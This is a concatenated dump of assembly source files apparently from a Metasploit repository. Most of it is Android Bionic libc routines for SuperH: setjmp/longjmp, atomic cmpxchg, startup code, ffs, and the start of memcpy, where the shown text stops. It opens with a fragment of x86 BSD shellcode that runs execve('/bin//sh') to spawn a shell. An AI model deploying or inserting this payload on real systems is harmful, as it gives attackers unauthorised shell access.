nop
cmp al, 45 ; ENOTSUP
jne .execve_binsh
.vfork:
mov al, 66 ; SYS_vfork
int 0x80 ; vfork()
cmp edx, byte 0 ; BSD: edx distinguishes parent (0) from child
jz .wait
;; Both child and parent continue to run execve below. The parent
;; fails and falls through to call wait4(), the child succeeds
;; and obviously doesn't call wait4() since it has exec'd a new
;; executable.
.execve_binsh:
;; execve("/bin//sh", NULL, NULL)
xor eax, eax
push eax ; "\0\0\0\0"
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push eax ; envp
push eax ; argv
push ebx ; path
push eax ; spacer
mov al, 59 ; SYS_execve
int 0x80
.wait:
;; Wait for child process to exit before continuing and crashing
xor eax, eax
push eax
mov ebx, esp
push eax ; rusage
push eax ; options
push ebx ; stat_loc
push eax ; pid
push eax ; spacer
mov al, 7 ; SYS_wait4
int 0x80
|
OpenWireSec/metasploit | 1,668 | external/source/meterpreter/source/bionic/libc/private/__dso_handle.S | /*
* Copyright (C) 2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
# The __dso_handle global variable is used by static
# C++ constructors and destructors in the binary.
# See http://www.codesourcery.com/public/cxx-abi/abi.html#dso-dtor
#
# Zero-initialized word whose *address* identifies this shared object;
# __cxa_atexit registers static C++ destructors against it.
.section .bss
.align 4
.globl __dso_handle
__dso_handle:
.long 0
|
OpenWireSec/metasploit | 1,833 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/atomic_cmpxchg.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
/*
 * int __atomic_cmpxchg(int old, int new, volatile int *ptr)
 *   r4 = expected old value, r5 = new value, r6 = address.
 * Returns 0 (and stores new) if *ptr == old, 1 otherwise.
 *
 * Uses the SH "gUSA" restartable-sequence convention: while r15 holds a
 * small negative value the kernel treats the region ending at the
 * address in r0 (set by mova) as atomic and restarts it if the thread
 * is preempted, giving cmpxchg semantics on UP without locked insns.
 */
.type __atomic_cmpxchg, @function
.globl __atomic_cmpxchg
.align 4
__atomic_cmpxchg:
mova 1f, r0 /* r0 = end-of-region address (gUSA requirement) */
nop
mov r15, r1 /* save real stack pointer */
mov #-8, r15 /* critical region start */
0: mov.l @r6, r2 /* r2 = current *ptr */
cmp/eq r2, r4 /* matches the expected old value? */
bt not_yet_modified
mov #1, r0 /* mismatch: return 1, store nothing */
bra done
nop
not_yet_modified:
mov #0, r0 /* match: return 0 */
mov.l r5, @r6 /* commit the new value */
done:
1: mov r1, r15 /* critical region end */
rts
nop
|
OpenWireSec/metasploit | 4,284 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: setjmp.S,v 1.10 2006/01/05 19:21:37 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
/*
 * int setjmp(jmp_buf env)
 * In:  r4 = env
 * Out: r0 = 0 on the direct return; a later longjmp resumes here
 *      returning the (non-zero) value passed to longjmp.
 * Records the current signal mask, then saves the callee-saved
 * context (pr, r8-r15, macl/mach and, on SH4 with an FPU, the FP
 * state) into env, filling the buffer from its top downwards.
 */
ENTRY(setjmp)
/* sigprocmask(SIG_BLOCK, NULL, &env[1]): read the current mask
 * without changing it; pr and env are preserved around the call */
PIC_PROLOGUE(.L_got_1)
sts.l pr, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_1, r0
mov r4, r6
mov #1, r4 /* how = SIG_BLOCK */
mov #0, r5 /* new = NULL */
1: CALL r0
add #4, r6 /* old = &sigmask */
mov.l @sp+, r4
lds.l @sp+, pr
PIC_EPILOGUE
/* identical to _setjmp except that the first word is non-zero */
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
/* save the FP context: fpscr, fpul and both banks of fr12-fr15
 * (frchg switches FP register banks); fpscr is cleared first so
 * the fmov.s stores run in a known FP mode, and the caller's
 * fpscr (kept in r1) is restored afterwards */
add #(_JBLEN * 4), r4
sts fpscr, r1
xor r0, r0
mov.l r1, @-r4
lds r0, fpscr
sts.l fpul, @-r4
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
frchg
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
lds r1, fpscr
#else
add #((_JBLEN - 10) * 4), r4
#endif
/* integer context: MAC registers, r15..r8, then the return address */
sts.l mach, @-r4
sts.l macl, @-r4
mov.l r15, @-r4
mov.l r14, @-r4
mov.l r13, @-r4
mov.l r12, @-r4
mov.l r11, @-r4
mov.l r10, @-r4
mov.l r9, @-r4
mov.l r8, @-r4
sts.l pr, @-r4
add #-4, r4 /* skip signal mask */
mov #1, r0
mov.l r0, @-r4 /* has signal mask */
rts
xor r0, r0 /* delay slot: return 0 */
.align 2
.L_got_1: PIC_GOT_DATUM
.L_sigprocmask_1: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(setjmp)
/*
 * void longjmp(jmp_buf env, int val)
 * In:  r4 = env, r5 = val
 * Restores the signal mask saved by setjmp, reloads the saved
 * register context, and returns val (forced to 1 when val == 0)
 * from the matching setjmp call.  Does not return to its caller.
 */
ENTRY(longjmp)
/* we won't return here, so we don't need to save pr and r12 */
PIC_PROLOGUE_NOSAVE(.L_got_2)
/* sigprocmask(SIG_SETMASK, &env[1], NULL); env/val preserved on sp */
mov.l r5, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_2, r0
mov r4, r5
mov #3, r4 /* how = SIG_SETMASK */
add #4, r5 /* new = &sigmask */
1: CALL r0
mov #0, r6 /* old = NULL */
mov.l @sp+, r4
mov.l @sp+, r5
/* identical to _longjmp */
add #8, r4 /* step over the flag word and the signal mask */
lds.l @r4+, pr
mov.l @r4+, r8
mov.l @r4+, r9
mov.l @r4+, r10
mov.l @r4+, r11
mov.l @r4+, r12
mov.l @r4+, r13
mov.l @r4+, r14
mov.l @r4+, r15
lds.l @r4+, macl
lds.l @r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
/* restore the FP context in the reverse order of setjmp's save */
xor r0, r0
lds r0, fpscr
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
lds.l @r4+, fpul
lds.l @r4+, fpscr
#endif
mov r5, r0
tst r0, r0 /* make sure return value is non-zero */
bf .L0
add #1, r0 /* val was 0: return 1 instead */
.L0:
rts
nop
.align 2
.L_got_2: PIC_GOT_DATUM
.L_sigprocmask_2: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(longjmp)
|
OpenWireSec/metasploit | 1,432 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/bzero.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/* bzero(3): memset with the fill byte fixed at zero.  Implemented by
 * assembling memset.S with its BZERO variant selected. */
#define BZERO
#include "memset.S"
|
OpenWireSec/metasploit | 4,254 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/sigsetjmp.S | /* $OpenBSD: sigsetjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: sigsetjmp.S,v 1.9 2006/01/05 19:21:37 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
 * int sigsetjmp(sigjmp_buf env, int savemask)
 * In:  r4 = env, r5 = savemask
 * Out: r0 = 0 on the direct return.
 * Like setjmp, but the signal mask is queried/saved only when
 * savemask is non-zero; savemask itself is stored in the first word
 * of env so siglongjmp knows whether to restore the mask.
 */
ENTRY(sigsetjmp)
tst r5, r5 /* if (savemask == 0) */
bt 2f
/* identical to setjmp */
/* sigprocmask(SIG_BLOCK, NULL, &env[1]) records the current mask */
PIC_PROLOGUE(.L_got_1)
sts.l pr, @-sp
mov.l r4, @-sp
mov.l r5, @-sp
mov.l .L_sigprocmask_1, r0
mov r4, r6
mov #1, r4 /* how = SIG_BLOCK */
mov #0, r5 /* new = NULL */
1: CALL r0
add #4, r6 /* old = &sigmask */
mov.l @sp+, r5
mov.l @sp+, r4
lds.l @sp+, pr
PIC_EPILOGUE
2: /* identical to _setjmp except that first word is in r5 */
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
/* save the FP context: fpscr, fpul and both banks of fr12-fr15;
 * fpscr is cleared so the fmov.s stores run in a known FP mode,
 * then the caller's fpscr (in r1) is restored */
add #(_JBLEN * 4), r4
sts fpscr, r1
xor r0, r0
mov.l r1, @-r4
lds r0, fpscr
sts.l fpul, @-r4
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
frchg
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
lds r1, fpscr
#else
add #((_JBLEN - 10) * 4), r4
#endif
/* integer context: MAC registers, r15..r8, then the return address */
sts.l mach, @-r4
sts.l macl, @-r4
mov.l r15, @-r4
mov.l r14, @-r4
mov.l r13, @-r4
mov.l r12, @-r4
mov.l r11, @-r4
mov.l r10, @-r4
mov.l r9, @-r4
mov.l r8, @-r4
sts.l pr, @-r4
add #-4, r4 /* skip signal mask */
mov.l r5, @-r4 /* has signal mask? */
rts
xor r0, r0 /* delay slot: return 0 */
.align 2
.L_got_1: PIC_GOT_DATUM
.L_sigprocmask_1: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(sigsetjmp)
/*
 * void siglongjmp(sigjmp_buf env, int val)
 * In:  r4 = env, r5 = val
 * Restores the signal mask only if sigsetjmp stored a non-zero flag
 * in env's first word, then reloads the saved context and returns
 * val (forced to 1 when val == 0) from the sigsetjmp call site.
 */
ENTRY(siglongjmp)
mov.l @r4+, r0 /* first word of env: the saved savemask flag */
tst r0, r0
bt 2f /* if no mask */
/* identical to longjmp */
/* we won't return here, so we don't need to save pr and r12 */
PIC_PROLOGUE_NOSAVE(.L_got_2)
mov.l r5, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_2, r0
mov r4, r5 /* new = &sigmask */
mov #3, r4 /* how = SIG_SETMASK */
1: CALL r0
mov #0, r6 /* old = NULL */
mov.l @sp+, r4
mov.l @sp+, r5
2: /* identical to _longjmp */
add #4, r4 /* skip the signal-mask slot (flag already consumed) */
lds.l @r4+, pr
mov.l @r4+, r8
mov.l @r4+, r9
mov.l @r4+, r10
mov.l @r4+, r11
mov.l @r4+, r12
mov.l @r4+, r13
mov.l @r4+, r14
mov.l @r4+, r15
lds.l @r4+, macl
lds.l @r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
/* restore the FP context in the reverse order of the save */
xor r0, r0
lds r0, fpscr
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
lds.l @r4+, fpul
lds.l @r4+, fpscr
#endif
mov r5, r0
tst r0, r0 /* make sure return value is non-zero */
bf .L0
add #1, r0 /* val was 0: return 1 instead */
.L0:
rts
nop
.align 2
.L_got_2: PIC_GOT_DATUM
.L_sigprocmask_2: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(siglongjmp)
|
OpenWireSec/metasploit | 2,799 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtbegin_static.S | /*
* Copyright (C) 2009-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# its purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r15, r4 /* arg 1: raw data block = initial stack pointer */
mov #0, r5 /* arg 2: onexit, unused */
mov.l 0f, r6 /* arg 3: &main, via the literal pool below */
mova 2f, r0 /* arg 4: the structors table at 2f */
mov r0, r7
mov.l 1f, r0
jmp @r0 /* tail-call __libc_init; it never returns here */
nop
.balign 4
0: .long main
1: .long __libc_init
/* table of the four structor-array addresses passed to __libc_init */
2: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
/* each array below starts with a -1 sentinel; crtend.S (linked last)
 * supplies the terminating 0 entry */
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 2,956 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/ffs.S | /* $NetBSD: ffs.S,v 1.1 2005/12/20 19:28:50 christos Exp $ */
/*-
* Copyright (c) 2002 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by ITOH Yasufumi.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the NetBSD
* Foundation, Inc. and its contributors.
* 4. Neither the name of The NetBSD Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
* ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
#if defined(LIBC_SCCS) && !defined(lint)
RCSID("$NetBSD: ffs.S,v 1.1 2005/12/20 19:28:50 christos Exp $")
#endif
/*
* ffs - find first bit set
*
* This code makes use of ``test 8bit'' and ``shift 8bit'' instructions.
* The remaining 8bit is tested in every 2bit.
*/
/*
 * int ffs(int i) - index (1-based) of the least significant set bit,
 * or 0 when i == 0.
 * In:  r4 = i   Out: r0 = 0..32
 * Scans a byte at a time (shlr8), keeping the candidate base index
 * in r1; the final byte is resolved two bits at a time, and addc
 * folds the T bit from the last tst into the result.
 */
ENTRY(ffs)
mov r4,r0 ! using r0 specific instructions
tst #0xff,r0
bf/s L8bit
mov #0+1,r1 ! ret = 1..8
tst r0,r0 ! ffs(0) is 0
bt Lzero ! testing here to accelerate ret=1..8 cases
shlr8 r0
tst #0xff,r0
bf/s L8bit
mov #8+1,r1 ! ret = 9..16
shlr8 r0
tst #0xff,r0
bf/s L8bit
mov #16+1,r1 ! ret = 17..24
shlr8 r0
mov #24+1,r1 ! ret = 25..32
L8bit:
! low byte of r0 is non-zero here; r1 = base index + 1.
! each tst leaves T = 1 when the tested bit is clear, and
! addc r1,r0 computes r0 = r0 + r1 + T.
tst #0x0f,r0
bt 4f
tst #0x03,r0
bt 2f
tst #0x01,r0 ! not bit 0 -> T
mov #0,r0
rts
addc r1,r0 ! 0 + r1 + T -> r0
2: tst #0x04,r0 ! bits 2..3
mov #2,r0
rts
addc r1,r0
4: tst #0x30,r0
bt 6f
tst #0x10,r0 ! bits 4..5
mov #4,r0
rts
addc r1,r0
6: tst #0x40,r0 ! bits 6..7
mov #6,r0
rts
addc r1,r0
Lzero: rts
nop
|
OpenWireSec/metasploit | 6,642 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/memcpy.S | /* $OpenBSD: memcpy.S,v 1.1.1.1 2006/10/10 22:07:10 miod Exp $ */
/* $NetBSD: memcpy.S,v 1.2 2006/04/22 23:53:47 uwe Exp $ */
/*
* Copyright (c) 2000 SHIMIZU Ryo <ryo@misakimix.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
/* One source builds three entry points; register roles differ:
 * memcpy/memmove: r4 = dst, r5 = src, r6 = len, returns dst (r3 copy)
 * bcopy:          r4 = src, r5 = dst, r6 = len, no return value */
#if !defined(MEMCOPY) && !defined(MEMMOVE) && !defined(BCOPY)
#define MEMCOPY
#endif
#if defined(MEMCOPY) || defined(MEMMOVE)
#define REG_DST0 r3
#define REG_SRC r5
#define REG_DST r4
#else
#define REG_SRC r4
#define REG_DST r5
#endif
#define REG_LEN r6
/*
 * Forward copy with longword/word/byte alignment handling; when dst
 * lies above src (possible overlap) the copy runs backwards from the
 * ends of the buffers instead.
 * NOTE: SH delayed branches (bt/s, bf/s, bra) execute the following
 * instruction before the branch takes effect; several delay slots
 * below are shared with the fall-through path across a label.
 */
#if defined(MEMCOPY)
ENTRY(memcpy)
#elif defined(MEMMOVE)
ENTRY(memmove)
#elif defined(BCOPY)
ENTRY(bcopy)
#endif
#ifdef REG_DST0
mov REG_DST,REG_DST0 /* keep dst for the return value */
#endif
cmp/eq REG_DST,REG_SRC /* if ( src == dst ) return; */
bt/s bcopy_return
cmp/hi REG_DST,REG_SRC /* delay slot: T = (src > dst) unsigned */
bf/s bcopy_overlap /* dst above src: copy backwards */
mov REG_SRC,r0
xor REG_DST,r0
and #3,r0
mov r0,r1
tst r0,r0 /* (src ^ dst) & 3 */
bf/s word_align
longword_align:
/* src and dst can be brought to the same 4-byte alignment */
tst REG_LEN,REG_LEN /* if ( len==0 ) return; (also bf/s delay slot) */
bt/s bcopy_return
mov REG_SRC,r0
tst #1,r0 /* if ( src & 1 ) */
bt 1f
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN
mov.b r0,@REG_DST
add #1,REG_DST
1:
mov #1,r0
cmp/hi r0,REG_LEN /* if ( (len > 1) && */
bf/s 1f
mov REG_SRC,r0
tst #2,r0 /* (src & 2) { */
bt 1f
mov.w @REG_SRC+,r0 /* *((unsigned short*)dst)++ = *((unsigned short*)src)++; */
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@REG_DST
add #2,REG_DST /* } */
1:
mov #3,r1
